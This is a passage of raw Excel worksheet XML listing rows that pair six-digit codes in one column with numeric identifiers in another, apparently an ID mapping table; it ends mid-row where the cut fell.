      <c r="F1808" s="1"/>
      <c r="H1808" s="1"/>
    </row>
    <row r="1809" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1809" s="5">
        <v>700567</v>
      </c>
      <c r="B1809" s="3">
        <v>901217</v>
      </c>
      <c r="D1809" s="5"/>
      <c r="E1809" s="3"/>
      <c r="F1809" s="1"/>
      <c r="H1809" s="1"/>
    </row>
    <row r="1810" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1810" s="5">
        <v>700567</v>
      </c>
      <c r="B1810" s="3">
        <v>901059.00300000003</v>
      </c>
      <c r="D1810" s="5"/>
      <c r="E1810" s="3"/>
      <c r="F1810" s="1"/>
      <c r="H1810" s="1"/>
    </row>
    <row r="1811" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1811" s="5">
        <v>700567</v>
      </c>
      <c r="B1811" s="3">
        <v>901543.00300000003</v>
      </c>
      <c r="D1811" s="5"/>
      <c r="E1811" s="3"/>
      <c r="F1811" s="1"/>
      <c r="H1811" s="1"/>
    </row>
    <row r="1812" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1812" s="5">
        <v>700567</v>
      </c>
      <c r="B1812" s="3">
        <v>901005</v>
      </c>
      <c r="D1812" s="5"/>
      <c r="E1812" s="3"/>
      <c r="F1812" s="1"/>
      <c r="H1812" s="1"/>
    </row>
    <row r="1813" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1813" s="5">
        <v>700567</v>
      </c>
      <c r="B1813" s="3">
        <v>901074.00100000005</v>
      </c>
      <c r="D1813" s="5"/>
      <c r="E1813" s="3"/>
      <c r="F1813" s="1"/>
      <c r="H1813" s="1"/>
    </row>
    <row r="1814" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1814" s="5">
        <v>700567</v>
      </c>
      <c r="B1814" s="3">
        <v>901140</v>
      </c>
      <c r="D1814" s="5"/>
      <c r="E1814" s="3"/>
      <c r="F1814" s="1"/>
      <c r="H1814" s="1"/>
    </row>
    <row r="1815" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1815" s="5">
        <v>700567</v>
      </c>
      <c r="B1815" s="3">
        <v>901083</v>
      </c>
      <c r="D1815" s="5"/>
      <c r="E1815" s="3"/>
      <c r="F1815" s="1"/>
      <c r="H1815" s="1"/>
    </row>
    <row r="1816" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1816" s="5">
        <v>700567</v>
      </c>
      <c r="B1816" s="3">
        <v>901574</v>
      </c>
      <c r="D1816" s="5"/>
      <c r="E1816" s="3"/>
      <c r="F1816" s="1"/>
      <c r="H1816" s="1"/>
    </row>
    <row r="1817" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1817" s="5">
        <v>700567</v>
      </c>
      <c r="B1817" s="3">
        <v>901070.00399999996</v>
      </c>
      <c r="D1817" s="5"/>
      <c r="E1817" s="3"/>
      <c r="F1817" s="1"/>
      <c r="H1817" s="1"/>
    </row>
    <row r="1818" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1818" s="5">
        <v>700567</v>
      </c>
      <c r="B1818" s="3">
        <v>901105</v>
      </c>
      <c r="D1818" s="5"/>
      <c r="E1818" s="3"/>
      <c r="F1818" s="1"/>
      <c r="H1818" s="1"/>
    </row>
    <row r="1819" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1819" s="5">
        <v>700567</v>
      </c>
      <c r="B1819" s="3">
        <v>901056.00100000005</v>
      </c>
      <c r="D1819" s="5"/>
      <c r="E1819" s="3"/>
      <c r="F1819" s="1"/>
      <c r="H1819" s="1"/>
    </row>
    <row r="1820" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1820" s="5">
        <v>700567</v>
      </c>
      <c r="B1820" s="3">
        <v>901036.005</v>
      </c>
      <c r="D1820" s="5"/>
      <c r="E1820" s="3"/>
      <c r="F1820" s="1"/>
      <c r="H1820" s="1"/>
    </row>
    <row r="1821" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1821" s="5">
        <v>700567</v>
      </c>
      <c r="B1821" s="3">
        <v>901027</v>
      </c>
      <c r="D1821" s="5"/>
      <c r="E1821" s="3"/>
      <c r="F1821" s="1"/>
      <c r="H1821" s="1"/>
    </row>
    <row r="1822" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1822" s="5">
        <v>700567</v>
      </c>
      <c r="B1822" s="3">
        <v>901057</v>
      </c>
      <c r="D1822" s="5"/>
      <c r="E1822" s="3"/>
      <c r="F1822" s="1"/>
      <c r="H1822" s="1"/>
    </row>
    <row r="1823" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1823" s="5">
        <v>700567</v>
      </c>
      <c r="B1823" s="3">
        <v>901012</v>
      </c>
      <c r="D1823" s="5"/>
      <c r="E1823" s="3"/>
      <c r="F1823" s="1"/>
      <c r="H1823" s="1"/>
    </row>
    <row r="1824" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1824" s="5">
        <v>700567</v>
      </c>
      <c r="B1824" s="3">
        <v>901129</v>
      </c>
      <c r="D1824" s="5"/>
      <c r="E1824" s="3"/>
      <c r="F1824" s="1"/>
      <c r="H1824" s="1"/>
    </row>
    <row r="1825" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1825" s="5">
        <v>700567</v>
      </c>
      <c r="B1825" s="3">
        <v>901082</v>
      </c>
      <c r="D1825" s="5"/>
      <c r="E1825" s="3"/>
      <c r="F1825" s="1"/>
      <c r="H1825" s="1"/>
    </row>
    <row r="1826" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1826" s="5">
        <v>700567</v>
      </c>
      <c r="B1826" s="3">
        <v>901016</v>
      </c>
      <c r="D1826" s="5"/>
      <c r="E1826" s="3"/>
      <c r="F1826" s="1"/>
      <c r="H1826" s="1"/>
    </row>
    <row r="1827" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1827" s="5">
        <v>700567</v>
      </c>
      <c r="B1827" s="3">
        <v>901049</v>
      </c>
      <c r="D1827" s="5"/>
      <c r="E1827" s="3"/>
      <c r="F1827" s="1"/>
      <c r="H1827" s="1"/>
    </row>
    <row r="1828" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1828" s="5">
        <v>700567</v>
      </c>
      <c r="B1828" s="3">
        <v>901078</v>
      </c>
      <c r="D1828" s="5"/>
      <c r="E1828" s="3"/>
      <c r="F1828" s="1"/>
      <c r="H1828" s="1"/>
    </row>
    <row r="1829" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1829" s="5">
        <v>700315</v>
      </c>
      <c r="B1829" s="3">
        <v>901458</v>
      </c>
      <c r="D1829" s="5"/>
      <c r="E1829" s="3"/>
      <c r="F1829" s="1"/>
      <c r="H1829" s="1"/>
    </row>
    <row r="1830" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1830" s="5">
        <v>700315</v>
      </c>
      <c r="B1830" s="3">
        <v>901422</v>
      </c>
      <c r="D1830" s="5"/>
      <c r="E1830" s="3"/>
      <c r="F1830" s="1"/>
      <c r="H1830" s="1"/>
    </row>
    <row r="1831" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1831" s="5">
        <v>700038</v>
      </c>
      <c r="B1831" s="3">
        <v>901134</v>
      </c>
      <c r="D1831" s="5"/>
      <c r="E1831" s="3"/>
      <c r="F1831" s="1"/>
      <c r="H1831" s="1"/>
    </row>
    <row r="1832" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1832" s="5">
        <v>700038</v>
      </c>
      <c r="B1832" s="3">
        <v>901087.00100000005</v>
      </c>
      <c r="D1832" s="5"/>
      <c r="E1832" s="3"/>
      <c r="F1832" s="1"/>
      <c r="H1832" s="1"/>
    </row>
    <row r="1833" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1833" s="5">
        <v>700038</v>
      </c>
      <c r="B1833" s="3">
        <v>901071</v>
      </c>
      <c r="D1833" s="5"/>
      <c r="E1833" s="3"/>
      <c r="F1833" s="1"/>
      <c r="H1833" s="1"/>
    </row>
    <row r="1834" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1834" s="5">
        <v>700038</v>
      </c>
      <c r="B1834" s="3">
        <v>901010</v>
      </c>
      <c r="D1834" s="5"/>
      <c r="E1834" s="3"/>
      <c r="F1834" s="1"/>
      <c r="H1834" s="1"/>
    </row>
    <row r="1835" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1835" s="5">
        <v>700038</v>
      </c>
      <c r="B1835" s="3">
        <v>901560.00300000003</v>
      </c>
      <c r="D1835" s="5"/>
      <c r="E1835" s="3"/>
      <c r="F1835" s="1"/>
      <c r="H1835" s="1"/>
    </row>
    <row r="1836" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1836" s="5">
        <v>700038</v>
      </c>
      <c r="B1836" s="3">
        <v>901543.00300000003</v>
      </c>
      <c r="D1836" s="5"/>
      <c r="E1836" s="3"/>
      <c r="F1836" s="1"/>
      <c r="H1836" s="1"/>
    </row>
    <row r="1837" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1837" s="5">
        <v>700038</v>
      </c>
      <c r="B1837" s="3">
        <v>901001.00199999998</v>
      </c>
      <c r="D1837" s="5"/>
      <c r="E1837" s="3"/>
      <c r="F1837" s="1"/>
      <c r="H1837" s="1"/>
    </row>
    <row r="1838" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1838" s="5">
        <v>700038</v>
      </c>
      <c r="B1838" s="3">
        <v>901074.00100000005</v>
      </c>
      <c r="D1838" s="5"/>
      <c r="E1838" s="3"/>
      <c r="F1838" s="1"/>
      <c r="H1838" s="1"/>
    </row>
    <row r="1839" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1839" s="5">
        <v>700038</v>
      </c>
      <c r="B1839" s="3">
        <v>901573.00100000005</v>
      </c>
      <c r="D1839" s="5"/>
      <c r="E1839" s="3"/>
      <c r="F1839" s="1"/>
      <c r="H1839" s="1"/>
    </row>
    <row r="1840" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1840" s="5">
        <v>700038</v>
      </c>
      <c r="B1840" s="3">
        <v>901056.00100000005</v>
      </c>
      <c r="D1840" s="5"/>
      <c r="E1840" s="3"/>
      <c r="F1840" s="1"/>
      <c r="H1840" s="1"/>
    </row>
    <row r="1841" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1841" s="5">
        <v>700038</v>
      </c>
      <c r="B1841" s="3">
        <v>901057</v>
      </c>
      <c r="D1841" s="5"/>
      <c r="E1841" s="3"/>
      <c r="F1841" s="1"/>
      <c r="H1841" s="1"/>
    </row>
    <row r="1842" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1842" s="5">
        <v>700038</v>
      </c>
      <c r="B1842" s="3">
        <v>901055.00100000005</v>
      </c>
      <c r="D1842" s="5"/>
      <c r="E1842" s="3"/>
      <c r="F1842" s="1"/>
      <c r="H1842" s="1"/>
    </row>
    <row r="1843" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1843" s="5">
        <v>700038</v>
      </c>
      <c r="B1843" s="3">
        <v>901055.01199999999</v>
      </c>
      <c r="D1843" s="5"/>
      <c r="E1843" s="3"/>
      <c r="F1843" s="1"/>
      <c r="H1843" s="1"/>
    </row>
    <row r="1844" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1844" s="5">
        <v>700038</v>
      </c>
      <c r="B1844" s="3">
        <v>901572</v>
      </c>
      <c r="D1844" s="5"/>
      <c r="E1844" s="3"/>
      <c r="F1844" s="1"/>
      <c r="H1844" s="1"/>
    </row>
    <row r="1845" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1845" s="5">
        <v>700038</v>
      </c>
      <c r="B1845" s="3">
        <v>901090.00100000005</v>
      </c>
      <c r="D1845" s="5"/>
      <c r="E1845" s="3"/>
      <c r="F1845" s="1"/>
      <c r="H1845" s="1"/>
    </row>
    <row r="1846" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1846" s="5">
        <v>700038</v>
      </c>
      <c r="B1846" s="3">
        <v>901021.00199999998</v>
      </c>
      <c r="D1846" s="5"/>
      <c r="E1846" s="3"/>
      <c r="F1846" s="1"/>
      <c r="H1846" s="1"/>
    </row>
    <row r="1847" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1847" s="5">
        <v>700038</v>
      </c>
      <c r="B1847" s="3">
        <v>901053.005</v>
      </c>
      <c r="D1847" s="5"/>
      <c r="E1847" s="3"/>
      <c r="F1847" s="1"/>
      <c r="H1847" s="1"/>
    </row>
    <row r="1848" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1848" s="5">
        <v>700038</v>
      </c>
      <c r="B1848" s="3">
        <v>901218.00699999998</v>
      </c>
      <c r="D1848" s="5"/>
      <c r="E1848" s="3"/>
      <c r="F1848" s="1"/>
      <c r="H1848" s="1"/>
    </row>
    <row r="1849" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1849" s="5">
        <v>700038</v>
      </c>
      <c r="B1849" s="3">
        <v>901016</v>
      </c>
      <c r="D1849" s="5"/>
      <c r="E1849" s="3"/>
      <c r="F1849" s="1"/>
      <c r="H1849" s="1"/>
    </row>
    <row r="1850" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1850" s="5">
        <v>700038</v>
      </c>
      <c r="B1850" s="3">
        <v>901049</v>
      </c>
      <c r="D1850" s="5"/>
      <c r="E1850" s="3"/>
      <c r="F1850" s="1"/>
      <c r="H1850" s="1"/>
    </row>
    <row r="1851" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1851" s="5">
        <v>700038</v>
      </c>
      <c r="B1851" s="3">
        <v>901078</v>
      </c>
      <c r="D1851" s="5"/>
      <c r="E1851" s="3"/>
      <c r="F1851" s="1"/>
      <c r="H1851" s="1"/>
    </row>
    <row r="1852" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1852" s="5">
        <v>700062</v>
      </c>
      <c r="B1852" s="3">
        <v>901071.00100000005</v>
      </c>
      <c r="D1852" s="5"/>
      <c r="E1852" s="3"/>
      <c r="F1852" s="1"/>
      <c r="H1852" s="1"/>
    </row>
    <row r="1853" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1853" s="5">
        <v>700062</v>
      </c>
      <c r="B1853" s="3">
        <v>901560.00100000005</v>
      </c>
      <c r="D1853" s="5"/>
      <c r="E1853" s="3"/>
      <c r="F1853" s="1"/>
      <c r="H1853" s="1"/>
    </row>
    <row r="1854" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1854" s="5">
        <v>700062</v>
      </c>
      <c r="B1854" s="3">
        <v>901547.00100000005</v>
      </c>
      <c r="D1854" s="5"/>
      <c r="E1854" s="3"/>
      <c r="F1854" s="1"/>
      <c r="H1854" s="1"/>
    </row>
    <row r="1855" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1855" s="5">
        <v>700062</v>
      </c>
      <c r="B1855" s="3">
        <v>901074.00100000005</v>
      </c>
      <c r="D1855" s="5"/>
      <c r="E1855" s="3"/>
      <c r="F1855" s="1"/>
      <c r="H1855" s="1"/>
    </row>
    <row r="1856" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1856" s="5">
        <v>700062</v>
      </c>
      <c r="B1856" s="3">
        <v>901041</v>
      </c>
      <c r="D1856" s="5"/>
      <c r="E1856" s="3"/>
      <c r="F1856" s="1"/>
      <c r="H1856" s="1"/>
    </row>
    <row r="1857" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1857" s="5">
        <v>700062</v>
      </c>
      <c r="B1857" s="3">
        <v>901008</v>
      </c>
      <c r="D1857" s="5"/>
      <c r="E1857" s="3"/>
      <c r="F1857" s="1"/>
      <c r="H1857" s="1"/>
    </row>
    <row r="1858" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1858" s="5">
        <v>700062</v>
      </c>
      <c r="B1858" s="3">
        <v>901083</v>
      </c>
      <c r="D1858" s="5"/>
      <c r="E1858" s="3"/>
      <c r="F1858" s="1"/>
      <c r="H1858" s="1"/>
    </row>
    <row r="1859" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1859" s="5">
        <v>700062</v>
      </c>
      <c r="B1859" s="3">
        <v>901070.00399999996</v>
      </c>
      <c r="D1859" s="5"/>
      <c r="E1859" s="3"/>
      <c r="F1859" s="1"/>
      <c r="H1859" s="1"/>
    </row>
    <row r="1860" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1860" s="5">
        <v>700062</v>
      </c>
      <c r="B1860" s="3">
        <v>901056.00100000005</v>
      </c>
      <c r="D1860" s="5"/>
      <c r="E1860" s="3"/>
      <c r="F1860" s="1"/>
      <c r="H1860" s="1"/>
    </row>
    <row r="1861" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1861" s="5">
        <v>700062</v>
      </c>
      <c r="B1861" s="3">
        <v>901570</v>
      </c>
      <c r="D1861" s="5"/>
      <c r="E1861" s="3"/>
      <c r="F1861" s="1"/>
      <c r="H1861" s="1"/>
    </row>
    <row r="1862" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1862" s="5">
        <v>700062</v>
      </c>
      <c r="B1862" s="3">
        <v>901027</v>
      </c>
      <c r="D1862" s="5"/>
      <c r="E1862" s="3"/>
      <c r="F1862" s="1"/>
      <c r="H1862" s="1"/>
    </row>
    <row r="1863" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1863" s="5">
        <v>700062</v>
      </c>
      <c r="B1863" s="3">
        <v>901120</v>
      </c>
      <c r="D1863" s="5"/>
      <c r="E1863" s="3"/>
      <c r="F1863" s="1"/>
      <c r="H1863" s="1"/>
    </row>
    <row r="1864" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1864" s="5">
        <v>700062</v>
      </c>
      <c r="B1864" s="3">
        <v>901057</v>
      </c>
      <c r="D1864" s="5"/>
      <c r="E1864" s="3"/>
      <c r="F1864" s="1"/>
      <c r="H1864" s="1"/>
    </row>
    <row r="1865" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1865" s="5">
        <v>700062</v>
      </c>
      <c r="B1865" s="3">
        <v>901091</v>
      </c>
      <c r="D1865" s="5"/>
      <c r="E1865" s="3"/>
      <c r="F1865" s="1"/>
      <c r="H1865" s="1"/>
    </row>
    <row r="1866" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1866" s="5">
        <v>700062</v>
      </c>
      <c r="B1866" s="3">
        <v>901113</v>
      </c>
      <c r="D1866" s="5"/>
      <c r="E1866" s="3"/>
      <c r="F1866" s="1"/>
      <c r="H1866" s="1"/>
    </row>
    <row r="1867" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1867" s="5">
        <v>700062</v>
      </c>
      <c r="B1867" s="3">
        <v>901518</v>
      </c>
      <c r="D1867" s="5"/>
      <c r="E1867" s="3"/>
      <c r="F1867" s="1"/>
      <c r="H1867" s="1"/>
    </row>
    <row r="1868" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1868" s="5">
        <v>700062</v>
      </c>
      <c r="B1868" s="3">
        <v>901518.00100000005</v>
      </c>
      <c r="D1868" s="5"/>
      <c r="E1868" s="3"/>
      <c r="F1868" s="1"/>
      <c r="H1868" s="1"/>
    </row>
    <row r="1869" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1869" s="5">
        <v>700062</v>
      </c>
      <c r="B1869" s="3">
        <v>901082</v>
      </c>
      <c r="D1869" s="5"/>
      <c r="E1869" s="3"/>
      <c r="F1869" s="1"/>
      <c r="H1869" s="1"/>
    </row>
    <row r="1870" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1870" s="5">
        <v>700062</v>
      </c>
      <c r="B1870" s="3">
        <v>901047</v>
      </c>
      <c r="D1870" s="5"/>
      <c r="E1870" s="3"/>
      <c r="F1870" s="1"/>
      <c r="H1870" s="1"/>
    </row>
    <row r="1871" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1871" s="5">
        <v>700420</v>
      </c>
      <c r="B1871" s="3">
        <v>901475</v>
      </c>
      <c r="D1871" s="5"/>
      <c r="E1871" s="3"/>
      <c r="F1871" s="1"/>
      <c r="H1871" s="1"/>
    </row>
    <row r="1872" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1872" s="5">
        <v>700420</v>
      </c>
      <c r="B1872" s="3">
        <v>901407</v>
      </c>
      <c r="D1872" s="5"/>
      <c r="E1872" s="3"/>
      <c r="F1872" s="1"/>
      <c r="H1872" s="1"/>
    </row>
    <row r="1873" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1873" s="5">
        <v>700420</v>
      </c>
      <c r="B1873" s="3">
        <v>901404</v>
      </c>
      <c r="D1873" s="5"/>
      <c r="E1873" s="3"/>
      <c r="F1873" s="1"/>
      <c r="H1873" s="1"/>
    </row>
    <row r="1874" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1874" s="5">
        <v>700420</v>
      </c>
      <c r="B1874" s="3">
        <v>901478</v>
      </c>
      <c r="D1874" s="5"/>
      <c r="E1874" s="3"/>
      <c r="F1874" s="1"/>
      <c r="H1874" s="1"/>
    </row>
    <row r="1875" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1875" s="5">
        <v>700420</v>
      </c>
      <c r="B1875" s="3">
        <v>901400</v>
      </c>
      <c r="D1875" s="5"/>
      <c r="E1875" s="3"/>
      <c r="F1875" s="1"/>
      <c r="H1875" s="1"/>
    </row>
    <row r="1876" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1876" s="5">
        <v>700420</v>
      </c>
      <c r="B1876" s="3">
        <v>901406</v>
      </c>
      <c r="D1876" s="5"/>
      <c r="E1876" s="3"/>
      <c r="F1876" s="1"/>
      <c r="H1876" s="1"/>
    </row>
    <row r="1877" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1877" s="5">
        <v>700420</v>
      </c>
      <c r="B1877" s="3">
        <v>901426</v>
      </c>
      <c r="D1877" s="5"/>
      <c r="E1877" s="3"/>
      <c r="F1877" s="1"/>
      <c r="H1877" s="1"/>
    </row>
    <row r="1878" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1878" s="5">
        <v>700024</v>
      </c>
      <c r="B1878" s="3">
        <v>901071.00100000005</v>
      </c>
      <c r="D1878" s="5"/>
      <c r="E1878" s="3"/>
      <c r="F1878" s="1"/>
      <c r="H1878" s="1"/>
    </row>
    <row r="1879" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1879" s="5">
        <v>700024</v>
      </c>
      <c r="B1879" s="3">
        <v>901543.00300000003</v>
      </c>
      <c r="D1879" s="5"/>
      <c r="E1879" s="3"/>
      <c r="F1879" s="1"/>
      <c r="H1879" s="1"/>
    </row>
    <row r="1880" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1880" s="5">
        <v>700024</v>
      </c>
      <c r="B1880" s="3">
        <v>901074.00100000005</v>
      </c>
      <c r="D1880" s="5"/>
      <c r="E1880" s="3"/>
      <c r="F1880" s="1"/>
      <c r="H1880" s="1"/>
    </row>
    <row r="1881" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1881" s="5">
        <v>700024</v>
      </c>
      <c r="B1881" s="3">
        <v>901140</v>
      </c>
      <c r="D1881" s="5"/>
      <c r="E1881" s="3"/>
      <c r="F1881" s="1"/>
      <c r="H1881" s="1"/>
    </row>
    <row r="1882" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1882" s="5">
        <v>700024</v>
      </c>
      <c r="B1882" s="3">
        <v>901041</v>
      </c>
      <c r="D1882" s="5"/>
      <c r="E1882" s="3"/>
      <c r="F1882" s="1"/>
      <c r="H1882" s="1"/>
    </row>
    <row r="1883" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1883" s="5">
        <v>700024</v>
      </c>
      <c r="B1883" s="3">
        <v>901105</v>
      </c>
      <c r="D1883" s="5"/>
      <c r="E1883" s="3"/>
      <c r="F1883" s="1"/>
      <c r="H1883" s="1"/>
    </row>
    <row r="1884" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1884" s="5">
        <v>700024</v>
      </c>
      <c r="B1884" s="3">
        <v>901027.00199999998</v>
      </c>
      <c r="D1884" s="5"/>
      <c r="E1884" s="3"/>
      <c r="F1884" s="1"/>
      <c r="H1884" s="1"/>
    </row>
    <row r="1885" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1885" s="5">
        <v>700024</v>
      </c>
      <c r="B1885" s="3">
        <v>901055</v>
      </c>
      <c r="D1885" s="5"/>
      <c r="E1885" s="3"/>
      <c r="F1885" s="1"/>
      <c r="H1885" s="1"/>
    </row>
    <row r="1886" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1886" s="5">
        <v>700024</v>
      </c>
      <c r="B1886" s="3">
        <v>901055.00100000005</v>
      </c>
      <c r="D1886" s="5"/>
      <c r="E1886" s="3"/>
      <c r="F1886" s="1"/>
      <c r="H1886" s="1"/>
    </row>
    <row r="1887" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1887" s="5">
        <v>700024</v>
      </c>
      <c r="B1887" s="3">
        <v>901053.005</v>
      </c>
      <c r="D1887" s="5"/>
      <c r="E1887" s="3"/>
      <c r="F1887" s="1"/>
      <c r="H1887" s="1"/>
    </row>
    <row r="1888" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1888" s="5">
        <v>700024</v>
      </c>
      <c r="B1888" s="3">
        <v>901518</v>
      </c>
      <c r="D1888" s="5"/>
      <c r="E1888" s="3"/>
      <c r="F1888" s="1"/>
      <c r="H1888" s="1"/>
    </row>
    <row r="1889" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1889" s="5">
        <v>700024</v>
      </c>
      <c r="B1889" s="3">
        <v>901082</v>
      </c>
      <c r="D1889" s="5"/>
      <c r="E1889" s="3"/>
      <c r="F1889" s="1"/>
      <c r="H1889" s="1"/>
    </row>
    <row r="1890" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1890" s="5">
        <v>700024</v>
      </c>
      <c r="B1890" s="3">
        <v>901016</v>
      </c>
      <c r="D1890" s="5"/>
      <c r="E1890" s="3"/>
      <c r="F1890" s="1"/>
      <c r="H1890" s="1"/>
    </row>
    <row r="1891" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1891" s="5">
        <v>700024</v>
      </c>
      <c r="B1891" s="3">
        <v>901033</v>
      </c>
      <c r="D1891" s="5"/>
      <c r="E1891" s="3"/>
      <c r="F1891" s="1"/>
      <c r="H1891" s="1"/>
    </row>
    <row r="1892" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1892" s="5">
        <v>700024</v>
      </c>
      <c r="B1892" s="3">
        <v>901007</v>
      </c>
      <c r="D1892" s="5"/>
      <c r="E1892" s="3"/>
      <c r="F1892" s="1"/>
      <c r="H1892" s="1"/>
    </row>
    <row r="1893" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1893" s="5">
        <v>700024</v>
      </c>
      <c r="B1893" s="3">
        <v>901497.00100000005</v>
      </c>
      <c r="D1893" s="5"/>
      <c r="E1893" s="3"/>
      <c r="F1893" s="1"/>
      <c r="H1893" s="1"/>
    </row>
    <row r="1894" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1894" s="5">
        <v>700377</v>
      </c>
      <c r="B1894" s="3">
        <v>901071.00399999996</v>
      </c>
      <c r="D1894" s="5"/>
      <c r="E1894" s="3"/>
      <c r="F1894" s="1"/>
      <c r="H1894" s="1"/>
    </row>
    <row r="1895" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1895" s="5">
        <v>700377</v>
      </c>
      <c r="B1895" s="3">
        <v>901020</v>
      </c>
      <c r="D1895" s="5"/>
      <c r="E1895" s="3"/>
      <c r="F1895" s="1"/>
      <c r="H1895" s="1"/>
    </row>
    <row r="1896" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1896" s="5">
        <v>700377</v>
      </c>
      <c r="B1896" s="3">
        <v>901059.00600000005</v>
      </c>
      <c r="D1896" s="5"/>
      <c r="E1896" s="3"/>
      <c r="F1896" s="1"/>
      <c r="H1896" s="1"/>
    </row>
    <row r="1897" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1897" s="5">
        <v>700377</v>
      </c>
      <c r="B1897" s="3">
        <v>901554</v>
      </c>
      <c r="D1897" s="5"/>
      <c r="E1897" s="3"/>
      <c r="F1897" s="1"/>
      <c r="H1897" s="1"/>
    </row>
    <row r="1898" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1898" s="5">
        <v>700377</v>
      </c>
      <c r="B1898" s="3">
        <v>901132.00100000005</v>
      </c>
      <c r="D1898" s="5"/>
      <c r="E1898" s="3"/>
      <c r="F1898" s="1"/>
      <c r="H1898" s="1"/>
    </row>
    <row r="1899" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1899" s="5">
        <v>700377</v>
      </c>
      <c r="B1899" s="3">
        <v>901140</v>
      </c>
      <c r="D1899" s="5"/>
      <c r="E1899" s="3"/>
      <c r="F1899" s="1"/>
      <c r="H1899" s="1"/>
    </row>
    <row r="1900" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1900" s="5">
        <v>700377</v>
      </c>
      <c r="B1900" s="3">
        <v>901568.00199999998</v>
      </c>
      <c r="D1900" s="5"/>
      <c r="E1900" s="3"/>
      <c r="F1900" s="1"/>
      <c r="H1900" s="1"/>
    </row>
    <row r="1901" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1901" s="5">
        <v>700377</v>
      </c>
      <c r="B1901" s="3">
        <v>901573.00100000005</v>
      </c>
      <c r="D1901" s="5"/>
      <c r="E1901" s="3"/>
      <c r="F1901" s="1"/>
      <c r="H1901" s="1"/>
    </row>
    <row r="1902" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A1902" s="5">
        <v>700377</v>
      </c>
      <c r="B1902" s="3">
        <v>901041</v>
